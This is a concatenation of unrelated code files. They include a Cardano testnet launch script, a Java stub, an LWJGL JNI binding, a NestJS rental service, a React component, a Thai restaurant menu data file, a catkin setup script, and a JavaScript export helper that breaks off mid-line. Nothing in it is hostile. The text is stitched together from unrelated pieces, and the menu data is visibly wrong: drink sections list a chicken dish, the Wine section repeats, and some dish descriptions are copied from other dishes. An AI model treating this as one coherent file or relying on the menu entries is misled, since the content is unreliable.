configuration="${ROOT}/scripts/lite/configuration"

# Working directory: use $1 if supplied, otherwise a fresh temp directory.
if [ "$1" == "" ];then
  data_dir="$(mktemp).d"
else
  data_dir=$1
fi
mkdir -p "${data_dir}"

# Generate shelley genesis spec
ARGSSPEC=(
  --genesis-dir "${data_dir}/genesis"
  --testnet-magic 42
)
cabal run exe:cardano-cli -- genesis create "${ARGSSPEC[@]}"

# Prefer the GNU variants of date/sed on macOS (the BSD tools that ship with
# Darwin do not support the same flags).
OS=$(uname -s)
case $OS in
  Darwin ) DATE="gdate"; SED='gsed';;
  * ) DATE="date"; SED='sed' ;;
esac

# We're going to use really quick epochs (300 seconds), by using short slots 1s
# and K=10, but we'll keep long KES periods so we don't have to bother
# cycling KES keys
# NOTE(review): the slotLength substitution below replaces 1 with 1 (a no-op)
# — confirm whether a different slot length was intended.
$SED -i ${data_dir}/genesis/genesis.spec.json \
  -e 's/"slotLength": 1/"slotLength": 1/' \
  -e 's/"activeSlotsCoeff": 5.0e-2/"activeSlotsCoeff": 0.1/' \
  -e 's/"securityParam": 2160/"securityParam": 10/' \
  -e 's/"epochLength": 432000/"epochLength": 1500/' \
  -e 's/"maxLovelaceSupply": 0/"maxLovelaceSupply": 9000/' \
  -e 's/"decentralisationParam": 1.0/"decentralisationParam": 0.7/'

# Generate shelley genesis "for real"
ARGS=(
  --genesis-dir "${data_dir}/genesis"
  --gen-genesis-keys 3
  --gen-utxo-keys 3
  --testnet-magic 42
)
cabal run exe:cardano-cli -- genesis create "${ARGS[@]}"

# Compute genesis hash
cabal run exe:cardano-cli -- genesis hash --genesis "${data_dir}/genesis/genesis.json" | tail -1 > "${data_dir}"/genesis/GENHASH

# Ensure the node is built
cabal run --no-stats cardano-node cardano-node --help >/dev/null || true

# Configure and start one node per loop iteration.
for i in 1 2 3; do
  # Use copy default configuration and topolgy to configuration directory for a particular node instance
  cp -af "${configuration}/shelley-$i.yaml" "${data_dir}"
  cp -af "${configuration}/topology-node-$i.json" "${data_dir}"
  db_dir="${data_dir}/db/node-$i"
  socket_dir="${data_dir}/socket"
  mkdir -p "${db_dir}"
  mkdir -p "${socket_dir}"
  # ANSI escape character, used below to colour each node's log prefix.
  esc=$(printf '\033')
  # We need the following for a shelley node to be able to mint blocks:
  # - KES signing key
  # - VRF signing key
  # - Operational certificate
  # VRF keys have already been generated in the shelley genesis create command
  # Generate a KES keys
  mkdir -p "${data_dir}/node-$i"
  cabal run exe:cardano-cli -- node key-gen-KES \
    --verification-key-file "${data_dir}/node-$i/kes.vkey" \
    --signing-key-file "${data_dir}/node-$i/kes.skey"
  # Move genesis delegate keys generated in shelley genesis create command to its
  # respective node folder.
  mv "${data_dir}/genesis/delegate-keys/delegate$i.skey" "${data_dir}/node-$i/hotkey.skey"
  mv "${data_dir}/genesis/delegate-keys/delegate$i.vkey" "${data_dir}/node-$i/hotkey.vkey"
  mv "${data_dir}/genesis/delegate-keys/delegate$i.counter" "${data_dir}/node-$i/counterFile.counter"
  mv "${data_dir}/genesis/delegate-keys/delegate$i.vrf.skey" "${data_dir}/node-$i/vrf.skey"
  mv "${data_dir}/genesis/delegate-keys/delegate$i.vrf.vkey" "${data_dir}/node-$i/vrf.vkey"
  # Set permissions for the vrf private key file: read for owner only
  chmod gou-rwx "${data_dir}/node-$i/vrf.skey"
  chmod u+r "${data_dir}/node-$i/vrf.skey"
  # Issue an operational certificate:
  cabal run exe:cardano-cli -- node issue-op-cert \
    --kes-period 0 \
    --kes-verification-key-file "${data_dir}/node-$i/kes.vkey" \
    --cold-signing-key-file "${data_dir}/node-$i/hotkey.skey" \
    --operational-certificate-issue-counter-file "${data_dir}/node-$i/counterFile.counter" \
    --out-file "${data_dir}/node-$i/opcert"
  # Launch a node in the background, colouring its log prefix per node index
  # (colours 32..34) via the sed pipe.
  cabal run exe:cardano-node -- run \
    --database-path "${db_dir}" \
    --socket-path "${socket_dir}/node-$i-socket" \
    --port "300$i" \
    --config "${data_dir}/shelley-$i.yaml" \
    --topology "${data_dir}/topology-node-$i.json" \
    --shelley-vrf-key "${data_dir}/node-$i/vrf.skey" \
    --shelley-kes-key "${data_dir}/node-$i/kes.skey" \
    --shelley-operational-certificate "${data_dir}/node-$i/opcert" \
    | sed "s|^|${esc}[$((31+$i))m[node-$i]${esc}[0m |g" &
done

# Delegate keys were distributed to the node folders above; remove the leftovers.
rm -r "${data_dir}/genesis/delegate-keys"

# Kill every background node process when the script exits.
function cleanup()
{
  for child in $(jobs -p); do
    echo kill "$child" && kill "$child"
  done
}
# Block forever (until Ctrl-C / EOF on stdin) so the nodes keep running.
# NOTE(review): the trap is registered only AFTER `cat` returns, so an
# interrupt during the blocking `cat` may skip cleanup — confirm intended order.
cat
trap cleanup EXIT
|
package net.jlxip.sockswrapper;

/** Global configuration holder for the SOCKS wrapper. */
public class SocksWrapper {
    // Timeout in milliseconds, mutable so callers can tune it globally.
    // NOTE(review): presumably applied to socket operations — confirm at call sites.
    public static int timeout = 5000;
}
|
<reponame>mk12/mycraft<filename>lib/LWJGL/lwjgl-source-2/src/native/generated/opengl/org_lwjgl_opengl_EXTBlendFuncSeparate.c
/* MACHINE GENERATED FILE, DO NOT EDIT */
#include <jni.h>
#include "extgl.h"
/* Signature of the EXT_blend_func_separate entry point, resolved at runtime
 * and passed in from Java as a raw pointer. */
typedef void (APIENTRY *glBlendFuncSeparateEXTPROC) (GLenum sfactorRGB, GLenum dfactorRGB, GLenum sfactorAlpha, GLenum dfactorAlpha);
/* JNI bridge: casts the jlong function pointer back to the typed GL entry
 * point and forwards the four blend factors unchanged. */
JNIEXPORT void JNICALL Java_org_lwjgl_opengl_EXTBlendFuncSeparate_nglBlendFuncSeparateEXT(JNIEnv *env, jclass clazz, jint sfactorRGB, jint dfactorRGB, jint sfactorAlpha, jint dfactorAlpha, jlong function_pointer) {
	glBlendFuncSeparateEXTPROC glBlendFuncSeparateEXT = (glBlendFuncSeparateEXTPROC)((intptr_t)function_pointer);
	glBlendFuncSeparateEXT(sfactorRGB, dfactorRGB, sfactorAlpha, dfactorAlpha);
}
|
<gh_stars>0
import { Injectable } from '@nestjs/common';
import { RentBicycle } from './rent-bicycle.entity';
import { InjectRepository } from '@nestjs/typeorm';
import { getConnection, Repository } from 'typeorm';
import { CreateBicycleDto } from '../bicycle/dto/create-bicycle.dto';
import { CreateRentBicycleDto } from './dto/create-rent-bicycle.dto';
import { BicycleService } from '../bicycle/bicycle.service';
import { Bicycle } from '../bicycle/bicycle.entity';
@Injectable()
export class RentBicycleService {
  constructor(
    @InjectRepository(RentBicycle)
    private rentBicycleRepository: Repository<RentBicycle>,
  ) {}

  /**
   * Persist a new rental record.
   * @param Time rental duration in hours (stored internally in milliseconds)
   * @param bicycle the bicycle being rented
   */
  public async create(Time: number, bicycle: Bicycle): Promise<RentBicycle> {
    const rentDate = Date.now();
    const rentTime = Time * 3600000; // hours -> milliseconds
    return this.rentBicycleRepository.save({ rentTime, rentDate, bicycle });
  }

  /** Fetch all rental records. */
  public async getRentBicycle() {
    return getConnection()
      .createQueryBuilder()
      .select('rentBicycle')
      .from(RentBicycle, 'rentBicycle')
      .getMany();
  }

  /** Delete every rental whose rental window has already elapsed. */
  public async checkRentStatus() {
    const nowDate = Date.now();
    await getConnection()
      .createQueryBuilder()
      .delete()
      .from(RentBicycle)
      .where(':nowDate - rentDate > rentTime', { nowDate })
      .execute();
  }

  /** Remove the rental attached to the given bicycle id. */
  public async cancelRent(idProps: number) {
    await this.rentBicycleRepository.delete({ bicycleId: idProps });
  }
}
|
<reponame>liamdawson/DIM
import React from 'react';
import { DestinyActivityModifierDefinition } from 'bungie-api-ts/destiny2';
import BungieImage from '../dim-ui/BungieImage';
import PressTip from '../dim-ui/PressTip';
/** Renders an activity modifier's icon and name, with its description in a press tooltip. */
export function ActivityModifier({ modifier }: { modifier: DestinyActivityModifierDefinition }) {
  const { name, description, icon } = modifier.displayProperties;
  return (
    <div className="milestone-modifier">
      <BungieImage src={icon} />
      <div className="milestone-modifier-info">
        <PressTip tooltip={description}>
          <div className="milestone-modifier-name">{name}</div>
        </PressTip>
      </div>
    </div>
  );
}
|
<gh_stars>0
export default {
foods: [
{
name: 'Appetizers',
items: [
{
name: 'Crispy Egg Rolls',
description: 'Silver noodle, dried mushroom, cabbage and carrot served with plum sauce.',
price: 4.5,
imgUrl: null
},
{
name: 'Crispy Tofu',
description: 'Crispy Japanese tofu served with sweet chili sauce and peanut.',
price: 4.5,
imgUrl: null
},
{
name: '<NAME>ls',
description: 'Bean spouts, lettuce, cilantro and soft rice noodle wrapped in fresh rice paper served with homemade peanut dipping sauce.',
price: {
Tofu: 4.5,
Shrimp: 6
},
imgUrl: null
},
{
name: '<NAME>',
description: 'Crispy wonton filled with imitation crab meat and cream cheese served with plum sauce',
price: 6.5,
imgUrl: null
},
{
name: '<NAME>',
description: 'Crispy prawn with coconut shaving served with plum sauce.',
price: 7.5,
imgUrl: null
},
{
name: '<NAME>',
description: 'Marinated chicken wing, lightly breaded and fried until golden and crispy.',
price: 8.5,
imgUrl: null
},
{
name: '<NAME>',
description: 'Grilled marinated chicken skewers served with peanut sauce and cucumber sauce.',
price: 8.5,
imgUrl: null
},
{
name: '<NAME>',
description: 'Fried pork and cabbage dumpling served with ginger soy dipping sauce.',
price: 6,
imgUrl: null
},
{
name: '<NAME>',
description: 'Ground chicken and shrimp wrapped in a flour trailla deep-fried.',
price: 8.5,
imgUrl: null
},
{
name: '<NAME>',
description: 'Steam blue mussels with aromatic lemongrass and set in basil broth.',
price: 9,
imgUrl: null
},
{
name: '<NAME>',
description: 'Crispy calamari served with Siracha cream sauce.',
price: 10,
imgUrl: null
}
]
},
{
name: 'Soups',
items: [
{
name: '<NAME>',
description: 'Spicy lemongrass broth soup with kaffir, tomato, mushroom, onion and lime juice.',
price: {
Chicken: 8.95,
Tofu: 8.95,
Vegetable: 8.95,
Beef: 10,
Pork: 10,
Shrimp: 12,
Seafood: 14
},
spice: 2,
imgUrl: null
},
{
name: '<NAME>',
description: 'Galangal, lemongrass, kaffir leaves, mushroom, cabbage, lime juice and coconut milk.',
price: {
Chicken: 8.95,
Tofu: 8.95,
Vegetable: 8.95,
Beef: 10,
Pork: 10,
Shrimp: 12,
Seafood: 14
},
imgUrl: null
},
{
name: '<NAME>',
description: 'Shrimp wonton, shrimp, lettuce and bean sprout in clear broth soup.',
price: {
Chicken: 8.95,
Tofu: 8.95,
Vegetable: 8.95,
Beef: 10,
Pork: 10,
Shrimp: 12,
Seafood: 14
},
imgUrl: null
}
]
},
{
name: 'Salads',
items: [
{
name: 'House Salad',
description: 'Crispy tofu, hardboiled egg, lettuce, cucumber, grape tomato, red onion and cilantro served with curry peanut sweet and sour sauce.',
price: 7,
additions: [
{
name: 'Grilled chicken',
price: 4
}
],
imgUrl: null
},
{
name: 'Papaya Salad',
description: 'Shredded green papaya, Thai chili, green bean, tomato and peanut with spicy lime dressing.',
price: 8,
additions: [
{
name: 'Grilled shrimp',
price: 4
}
],
imgUrl: null
},
{
name: 'Glass Noodle Salad',
description: 'Steam glass noodle, ground chicken, shrimp, squid, onion, red onion, mint, cilantro tossed with chili lime juice and sweet chili paste.',
price: 12.95,
additions: [],
imgUrl: null
},
{
name: 'Beef Salad',
description: 'Grilled beef sirloin, tomato, cucumber, red onion, bell pepper, mints and cilantro with spicy lime dressing.',
price: 12,
additions: [],
imgUrl: null
},
{
name: 'Larb',
description: 'Ground chicken roosted rice powder, red onion, mints, cilantro, tossed with chili lime juice.',
price: 11.95,
additions: [],
imgUrl: null
}
]
},
{
name: 'Stir-Fried',
description: 'Served with steamed rice. Substitute brown rice add $1 Choice of Chicken, Tofu, Vegetable $11, Beef or Pork $12, Shrimp $14, Seafood $16',
items: [
{
name: 'Stir-Fried Cashew Nut',
description: 'Onion, celery, bell pepper, carrot, and cashew nut in roasted sweet chili sauce.',
price: null,
additions: [],
imgUrl: 'https://wildtigerwa.net/uploads/7/9/6/8/79685034/cashew_orig.jpg'
},
{
name: 'Stir-Fried Fresh Ginger',
description: 'Fresh ginger, mushroom, onion, carrot, and bell pepper.',
price: null,
additions: [],
imgUrl: null
},
{
name: 'Stir-Fried Garlic',
description: 'Sautéed roasted garlic, onion, mushroom, and cilantro in black pepper sauce over a bed of broccoli.',
price: null,
additions: [],
imgUrl: 'https://wildtigerwa.net/uploads/7/9/6/8/79685034/garlic_orig.jpg'
},
{
name: 'Stir-Fried Mixed Vegetables',
description: 'Stir-fried mixed vegetables in a wok with garlic soy sauce.',
price: null,
additions: [],
imgUrl: null
},
{
name: '<NAME>',
description: 'Steamed mixed vegetables topped with house peanut sauce.',
price: null,
additions: [],
imgUrl: null
},
{
name: 'Stir-Fried Basil',
description: 'Stir-fried ground chicken with bell pepper, green bean, onion and basil.',
price: 11.95,
additions: [],
imgUrl: 'https://wildtigerwa.net/uploads/7/9/6/8/79685034/stir-fried-basil_orig.jpg'
},
{
name: 'Stir-Fried Eggplant',
description: 'Onion, bell pepper, eggplant, and basil in roasted sweet chili sauce.',
price: null,
additions: [],
imgUrl: null
}
]
},
{
name: 'Curries',
description: 'Served with steamed rice. Substitute brown rice add $1 Choice of Chicken, Tofu, Vegetable $11, Beef or Pork $12 Shrimp $14, Seafood $16',
items: [
{
name: 'Red Curry',
description: 'Red curry with coconut milk, bamboo shoot, bell pepper, and basil.',
price: null,
spice: 2,
additions: [],
imgUrl: null
},
{
name: 'Green Curry',
description: 'Green curry with coconut milk, bamboo shoot, bell pepper, eggplant and basil.',
price: null,
spice: 2,
additions: [],
imgUrl: 'https://wildtigerwa.net/uploads/7/9/6/8/79685034/green-curry_orig.jpg'
},
{
name: 'Yellow Curry',
description: 'Yellow curry with coconut milk, potato, onion, carrot and sprinkled with shallots.',
price: null,
spice: 1,
additions: [],
imgUrl: null
},
{
name: 'Panang Curry',
description: 'A Panang curry with coconut milk, green bean, and bell peppers topped with ground peanut.',
price: null,
spice: 2,
additions: [],
imgUrl: 'https://wildtigerwa.net/uploads/7/9/6/8/79685034/panang_orig.jpg'
},
{
name: 'Mussaman Curry',
description: 'A mild slow cooked curry made with a blend of spices including nutmeg, cumin and cloves in coconut milk with onion, carrot, potato, and peanuts.',
price: null,
spice: 1,
additions: [],
imgUrl: null
},
{
name: 'Jungle Curry (no coconut milk)',
description: 'Spicy clear red curry with Thai herbs, fresh vegetables, bamboo shoot, mushroom, bell pepper and basil.',
price: null,
spice: 3,
additions: [],
imgUrl: null
}
]
},
{
name: 'Noodles',
items: [
{
name: '<NAME>',
description: 'Stir-fried wide-size rice in tamarind sauce with egg, bean sprout, and green onion served with chopped peanuts.',
price: null,
additions: [],
imgUrl: 'https://wildtigerwa.net/uploads/7/9/6/8/79685034/pad-thai_orig.jpg'
},
{
name: '<NAME>',
description: 'Stir-fried wide-size rice noodle with Thai chili, egg, onion, bell pepper, broccoli, tomato and basil served with raw bean sprout.',
price: null,
additions: [],
imgUrl: 'https://wildtigerwa.net/uploads/7/9/6/8/79685034/drunken-noodle_orig.jpg'
},
{
name: '<NAME>',
description: 'Stir-fried wide-size rice noodle with egg, carrot, broccoli, and sweet soy sauce.',
price: null,
additions: [],
imgUrl: 'https://wildtigerwa.net/uploads/7/9/6/8/79685034/pad-z-ew_orig.jpg'
},
{
name: '<NAME>',
description: 'Stir-fried bean thread with mushroom, cabbage, onion, celery, carrot, grape tomato, bean sprout and egg.',
price: null,
additions: [],
imgUrl: null
},
{
name: '<NAME>',
description: 'Stir-fried wide-size rice noodle with egg, cabbage, onion, and bean sprout in house soy sauce.',
price: null,
additions: [],
imgUrl: null
}
]
},
{
name: 'Noodles soups',
items: [
{
name: 'Tom Yum Noodle Soup',
description: 'Rice noodle or egg noodle with ground chicken, squid, shrimp, and mussle, bean sprout topped with chopped peanuts.',
price: 12.95,
spice: 2,
additions: [],
imgUrl: 'https://wildtigerwa.net/uploads/7/9/6/8/79685034/tom-yum-noodle_orig.jpg'
},
{
name: 'Clear Broth Noodle Soup',
description: 'Clear broth small rice noodle soup with bean sprout, cilantro and green onion.',
price: {
'Tofu': 11,
'Chicken': 11,
'Beef': 12
},
additions: [],
imgUrl: null
},
{
name: 'Khao Soi',
description: 'Egg noodle, shallot, cilantro in curry soup topped with crispy egg noodle.',
price: {
'Tofu': 11,
'Chicken': 11,
'Beef': 12
},
spice: 1,
additions: [],
imgUrl: 'https://wildtigerwa.net/uploads/7/9/6/8/79685034/khao-soi_orig.jpg'
}
]
},
{
name: 'Fried Rice',
items: [
{
name: 'Traditional Thai Fried Rice',
description: 'Stir-fried rice with egg, onion, grape tomato, peas, and carrots',
price: null,
additions: [],
imgUrl: 'https://wildtigerwa.net/uploads/7/9/6/8/79685034/traditional-fried-rice-shrimp_orig.jpg'
},
{
name: 'Pineapple Fried Rice',
description: 'Stir-fried rice with curry powder, egg, pineapple, cashew nut, raisins, onion, grape tomato, pea and carrot.',
price: null,
additions: [],
imgUrl: 'https://wildtigerwa.net/uploads/7/9/6/8/79685034/pineapple-fried-rice-chicken_orig.jpg'
},
{
name: 'Basil Fried Rice ',
description: 'Stir-fried rice with egg, bell pepper, onion, and basil.',
price: null,
additions: [],
imgUrl: null
}
]
},
{
name: 'House Specials',
items: [
{
name: 'Panang Curry Jumbo Prawn',
description: 'Grilled jumbo prawn topped with panang curry, bell pepper, green bean and asparagus.',
price: 17,
spice: 2,
additions: [],
imgUrl: null
},
{
name: 'Volcano Beef',
description: 'Stir fried beef sirloin, tomato, onion, asparagus, bell pepper, pineapple, grape tomato in house specials sauce',
price: 16,
additions: [],
imgUrl: null
},
{
name: 'Three flavors Salmon',
description: 'Pan fried sockeye salmon, topped with three flavor dressing, green bean, onion and bell pepper topped with crispy basil',
price: 15,
additions: [],
imgUrl: null
},
{
name: 'Terriyaki Chicken',
description: 'Charcoal boiled chicken served with steamed vegtable and rice',
price: 13,
additions: [],
imgUrl: null
},
{
name: 'Crispy Duck Curry',
description: 'Red curry with half roasted duck, pineapple, bell pepper, grape tomatoes, lychee and basil.',
price: 21,
spice: 2,
additions: [],
imgUrl: null
},
{
name: 'Pumpkin Curry',
description: 'Red curry with half roasted duck, pineapple, bell pepper, grape tomatoes, lychee and basil.',
price: 21,
spice: 2,
additions: [],
imgUrl: null
},
{
name: 'Dungeness Crab Fried Rice',
description: 'Golden pumpkin, lychee, bell pepper and basil inred curry sauce.',
price: {
'Chicken': 13,
'Pork': 13,
'Beef': 13,
'Tofu': 13,
'Grilled shrimp': 17
},
additions: [],
imgUrl: null
},
{
name: 'Lemongrass Chicken',
description: 'Grilled marinated lemongrass chicken with steamed vegetable and topped with peanut sauce.',
price: 13,
additions: [
{
name: 'Pad thai',
price: 1
}
],
imgUrl: null
}
]
}
],
drinks: [
{
name: 'Beer',
items: [
{
name: 'Lemongrass Chicken',
description: 'Grilled marinated lemongrass chicken with steamed vegetable and topped with peanut sauce.',
price: 13,
additions: [
{
name: 'Pad thai',
price: 1
}
],
imgUrl: null
}
]
},
{
name: 'Wine',
items: [
{
name: 'Lemongrass Chicken',
description: 'Grilled marinated lemongrass chicken with steamed vegetable and topped with peanut sauce.',
price: 13,
additions: [
{
name: 'Pad thai',
price: 1
}
],
imgUrl: null
}
]
},
{
name: 'Wine',
items: [
{
name: 'Lemongrass Chicken',
description: 'Grilled marinated lemongrass chicken with steamed vegetable and topped with peanut sauce.',
price: 13,
additions: [
{
name: 'Pad thai',
price: 1
}
],
imgUrl: null
}
]
},
{
name: '<NAME>',
items: [
{
name: 'Long Island Iced Tea',
description: 'Vodka, Gin, Tequila, Rum, Triple sec,Sour mix, and Splash of Coke',
price: 9,
imgUrl: null
},
{
name: '<NAME>',
description: '<NAME>, Triple Sec, Lemon Juice, Simple Syrub and Soda',
price: 8,
imgUrl: null
},
{
name: '<NAME>',
description: 'Yazi Vodka Ginger Beer, Lime Juice, and Thai Spice',
price: 8,
imgUrl: null
},
{
name: '<NAME>',
description: 'Tequila, Orange Juice',
price: 7,
imgUrl: null
},
{
name: '<NAME>',
description: 'Black Whiskey, Sour Apple Schnapps, and Cranberry Juice',
price: 8,
imgUrl: null
},
{
name: 'Mojito',
description: 'Muddles Fresh Mint, Silver Rum, Triple Sec, Lime Juice, top with Soda',
price: 8,
imgUrl: null
},
{
name: '<NAME>',
description: 'Silver Rum, Amaretto, Pineapple Juice, Sour Mix, and Garnadines',
price: 9,
imgUrl: null
}
]
},
{
name: 'Martini’s',
items: [
{
name: '<NAME>',
description: 'Citron Vodka, Simple syrub, Triple sec and lemon juice',
price: 8,
imgUrl: null
},
{
name: '<NAME>',
description: 'Banana Liquor, Creme De Cacao and Cream',
price: 8,
imgUrl: null
},
{
name: '<NAME>',
description: 'Viscova Vodka, Lime Juice, Triple Sec and Chambord',
price: 9,
imgUrl: null
},
{
name: '<NAME>',
description: 'Pendleton Whiskey, Sour Apple Schnapps, and Cranberry Juice',
price: 8,
imgUrl: null
},
{
name: 'Yazitini',
description: 'Yazi Ginger Vodka, Tripple Sec, Cranberry Juice and Lime Juice',
price: 8,
imgUrl: null
},
{
name: '<NAME>',
description: 'Orange Vodka, Muddled Lemon, Simple Syrub, Sour Mix, and Touch of Chambord',
price: 9,
imgUrl: null
},
{
name: '<NAME>’ <NAME>',
description: 'Pepper Vodka and Splash of Olive Juice',
price: 8,
imgUrl: null
}
]
}
]
} |
#!/usr/bin/env sh
# generated from catkin/cmake/template/setup.sh.in
# Sets various environment variables and sources additional environment hooks.
# It tries it's best to undo changes from a previously sourced setup file before.
# Supported command line options:
# --extend: skips the undoing of changes from a previously sourced setup file
# since this file is sourced either use the provided _CATKIN_SETUP_DIR
# or fall back to the destination set at configure time
: ${_CATKIN_SETUP_DIR:=/catkin_ws/devel}
_SETUP_UTIL="$_CATKIN_SETUP_DIR/_setup_util.py"
unset _CATKIN_SETUP_DIR
# Bail out (this file is sourced, hence `return`) if the helper is missing.
if [ ! -f "$_SETUP_UTIL" ]; then
  echo "Missing Python script: $_SETUP_UTIL"
  return 22
fi
# detect if running on Darwin platform
_UNAME=`uname -s`
_IS_DARWIN=0
if [ "$_UNAME" = "Darwin" ]; then
  _IS_DARWIN=1
fi
unset _UNAME
# make sure to export all environment variables
export CMAKE_PREFIX_PATH
export CPATH
# Darwin uses DYLD_LIBRARY_PATH in place of LD_LIBRARY_PATH.
if [ $_IS_DARWIN -eq 0 ]; then
  export LD_LIBRARY_PATH
else
  export DYLD_LIBRARY_PATH
fi
unset _IS_DARWIN
export PATH
export PKG_CONFIG_PATH
export PYTHONPATH
# remember type of shell if not already set
if [ -z "$CATKIN_SHELL" ]; then
  CATKIN_SHELL=sh
fi
# invoke Python script to generate necessary exports of environment variables
# use TMPDIR if it exists, otherwise fall back to /tmp
if [ -d "${TMPDIR}" ]; then
  _TMPDIR="${TMPDIR}"
else
  _TMPDIR=/tmp
fi
_SETUP_TMP=`mktemp "${_TMPDIR}/setup.sh.XXXXXXXXXX"`
unset _TMPDIR
if [ $? -ne 0 -o ! -f "$_SETUP_TMP" ]; then
  echo "Could not create temporary file: $_SETUP_TMP"
  return 1
fi
# The helper prints shell `export` statements for this shell type; collect
# them into the temp file, then source it below.
CATKIN_SHELL=$CATKIN_SHELL "$_SETUP_UTIL" $@ >> "$_SETUP_TMP"
_RC=$?
if [ $_RC -ne 0 ]; then
  if [ $_RC -eq 2 ]; then
    echo "Could not write the output of '$_SETUP_UTIL' to temporary file '$_SETUP_TMP': may be the disk if full?"
  else
    echo "Failed to run '\"$_SETUP_UTIL\" $@': return code $_RC"
  fi
  unset _RC
  unset _SETUP_UTIL
  rm -f "$_SETUP_TMP"
  unset _SETUP_TMP
  return 1
fi
unset _RC
unset _SETUP_UTIL
# Apply the generated exports, then discard the temporary file.
. "$_SETUP_TMP"
rm -f "$_SETUP_TMP"
unset _SETUP_TMP
# source all environment hooks
# The hook count and per-index variables were set by the sourced exports above.
_i=0
while [ $_i -lt $_CATKIN_ENVIRONMENT_HOOKS_COUNT ]; do
  eval _envfile=\$_CATKIN_ENVIRONMENT_HOOKS_$_i
  unset _CATKIN_ENVIRONMENT_HOOKS_$_i
  eval _envfile_workspace=\$_CATKIN_ENVIRONMENT_HOOKS_${_i}_WORKSPACE
  unset _CATKIN_ENVIRONMENT_HOOKS_${_i}_WORKSPACE
  # set workspace for environment hook
  CATKIN_ENV_HOOK_WORKSPACE=$_envfile_workspace
  . "$_envfile"
  unset CATKIN_ENV_HOOK_WORKSPACE
  _i=$((_i + 1))
done
unset _i
unset _CATKIN_ENVIRONMENT_HOOKS_COUNT
|
const get = require('lodash/get');
const has = require('lodash/has');
const pick = require('lodash/pick');
const uniqBy = require('lodash/uniqBy');
const {
NEVER,
EVENT_TYPE_LIST,
REPETITION_FREQUENCY_TYPE_LIST,
CANCELLATION_CONDITION_LIST,
CANCELLATION_REASON_LIST,
ABSENCE_TYPE_LIST,
ABSENCE_NATURE_LIST,
HOURLY,
CIVILITY_LIST,
END_CONTRACT_REASONS,
SURCHARGES,
PAYMENT_NATURE_LIST,
PAYMENT_TYPES_LIST,
INTERNAL_HOUR,
INTERVENTION,
MANUAL_TIME_STAMPING,
TIMESTAMPING_ACTION_TYPE_LIST,
MANUAL_TIME_STAMPING_REASONS,
EVENT_TRANSPORT_MODE_LIST,
INTRA,
ON_SITE,
REMOTE,
STEP_TYPES,
EXPECTATIONS,
END_OF_COURSE,
OPEN_QUESTION,
SURVEY,
QUESTION_ANSWER,
TIME_STAMPING_ACTIONS,
} = require('./constants');
const DatesHelper = require('./dates');
const { CompaniDate } = require('./dates/companiDates');
const { CompaniDuration } = require('./dates/companiDurations');
const UtilsHelper = require('./utils');
const NumbersHelper = require('./numbers');
const DraftPayHelper = require('./draftPay');
const CourseHelper = require('./courses');
const AttendanceSheet = require('../models/AttendanceSheet');
const DistanceMatrixHelper = require('./distanceMatrix');
const Event = require('../models/Event');
const Bill = require('../models/Bill');
const CreditNote = require('../models/CreditNote');
const Contract = require('../models/Contract');
const CourseSmsHistory = require('../models/CourseSmsHistory');
const CourseSlot = require('../models/CourseSlot');
const Course = require('../models/Course');
const Pay = require('../models/Pay');
const Payment = require('../models/Payment');
const FinalPay = require('../models/FinalPay');
const EventRepository = require('../repositories/EventRepository');
const UserRepository = require('../repositories/UserRepository');
const QuestionnaireHistory = require('../models/QuestionnaireHistory');
const Questionnaire = require('../models/Questionnaire');
// Message used when an export query matches nothing in the selected period.
const NO_DATA = 'Aucune donnée sur la periode selectionnée';
// Column headers, in order, for the working-events history export.
// The cell order built in exportWorkingEventsHistory must match this list.
const workingEventExportHeader = [
  'Type',
  'Heure interne',
  'Service',
  'Début planifié',
  'Début horodaté',
  'Type d\'horodatage',
  'Motif',
  'Fin planifiée',
  'Fin horodatée',
  'Type d\'horodatage',
  'Motif',
  'Durée',
  'Répétition',
  'Déplacement véhiculé avec bénéficiaire',
  'Mode de transport spécifique',
  'Équipe',
  'Id Auxiliaire',
  'Auxiliaire - Titre',
  'Auxiliaire - Prénom',
  'Auxiliaire - Nom',
  'A affecter',
  'Id Bénéficiaire',
  'Bénéficiaire - Titre',
  'Bénéficiaire - Nom',
  'Bénéficiaire - Prénom',
  'Divers',
  'Facturé',
  'Annulé',
  'Statut de l\'annulation',
  'Raison de l\'annulation',
];
// Resolve a service's display name from its most recent version; null when
// no service is attached.
const getServiceName = (service) => {
  if (!service) return null;
  return UtilsHelper.getLastVersion(service.versions, 'startDate').name;
};
// Most recent sector-history entry that started before the event did.
const getMatchingSector = (histories, event) => {
  const startedBefore = histories.filter(sh => CompaniDate(sh.startDate).isBefore(event.startDate));
  return startedBefore.sort(DatesHelper.descendingSort('startDate'))[0];
};
// Format the time-stamped date at `path` when a timestamp exists, otherwise
// the scheduled date, otherwise return an empty string.
const displayDate = (path, timestamp = null, scheduledDate = null) => {
  if (timestamp) return CompaniDate(get(timestamp, path)).format('dd/LL/yyyy HH:mm:ss');
  return scheduledDate ? CompaniDate(scheduledDate).format('dd/LL/yyyy HH:mm:ss') : '';
};
exports.getWorkingEventsForExport = async (startDate, endDate, companyId) => {
const query = {
company: companyId,
type: { $in: [INTERVENTION, INTERNAL_HOUR] },
$or: [
{ startDate: { $lte: endDate, $gte: startDate } },
{ endDate: { $lte: endDate, $gte: startDate } },
{ endDate: { $gte: endDate }, startDate: { $lte: startDate } },
],
};
const events = await Event.find(query)
.sort({ startDate: -1 })
.populate({ path: 'customer', populate: { path: 'subscriptions', populate: 'service' } })
.populate('internalHour')
.populate('sector')
.populate({ path: 'histories', match: { action: { $in: TIME_STAMPING_ACTIONS }, company: companyId } })
.lean();
const eventsWithPopulatedSubscription = events.map((event) => {
if (event.type !== INTERVENTION) return event;
const { subscription, customer } = event;
const customerSubscription = customer.subscriptions.find(sub =>
UtilsHelper.areObjectIdsEquals(sub._id, subscription));
return { ...event, subscription: customerSubscription };
});
return eventsWithPopulatedSubscription;
};
/**
 * Build the working-events export rows (header + one row per event) for the
 * credentials' company over [startDate, endDate].
 * Cell order must match workingEventExportHeader.
 */
exports.exportWorkingEventsHistory = async (startDate, endDate, credentials) => {
  const companyId = get(credentials, 'company._id');
  const events = await exports.getWorkingEventsForExport(startDate, endDate, companyId);
  // NOTE(review): if ev.auxiliary values are ObjectId instances, Set dedupes
  // by reference, so distinct instances of the same id are not merged —
  // confirm the repository tolerates duplicate ids.
  const auxiliaryIds = [...new Set(events.map(ev => ev.auxiliary))];
  const auxiliaries = await UserRepository.getAuxiliariesWithSectorHistory(auxiliaryIds, companyId);
  const rows = [workingEventExportHeader];
  for (const event of events) {
    let repetition = get(event.repetition, 'frequency');
    repetition = NEVER === repetition ? '' : REPETITION_FREQUENCY_TYPE_LIST[repetition];
    const auxiliary = event.auxiliary
